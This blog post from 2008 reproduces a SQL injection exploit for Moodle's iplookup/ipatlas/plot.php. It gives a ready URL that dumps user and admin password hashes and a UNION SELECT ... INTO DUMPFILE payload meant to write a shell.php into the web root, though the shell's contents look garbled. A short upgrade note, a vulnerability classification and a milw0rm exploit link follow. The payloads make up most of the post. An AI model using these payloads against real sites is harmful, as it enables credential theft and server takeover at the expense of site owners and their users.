Sabtu, 15 Maret 2008

BUG on moodle PHP

-- Security Internet

Manual Testing Notes
to view user/admin password hashes:

http://[target]/[path]/iplookup/ipatlas/plot.php?address=127. 0.0.1&user='or%20isnull(1/0)/* to inject a shell:

http://[target]/[path]/iplookup/ipatlas/plot.php?address=127.0 .0.1&user='UNION %20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, '%20',0,0,0,0,0,0,0,0%20INTO%20DUMPFILE%20'../ ../w ww/moodle/shell.php'%20FROM%20mdl_user/*

Solution Description
Upgrade to version 1.6dev or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Vulnerability classification:
- Remote vulnerability
- Input manipulation attack
- Impact on integrity
- Exploit available
- Verified

Second checking :
http://www.milw0rm.com/exploits/1312


OK,
Thank you

Label:

Diposting : yudhadewa di 11.50.00  

0 coment-ar:

Posting Komentar

Langganan: Posting Komentar (Atom)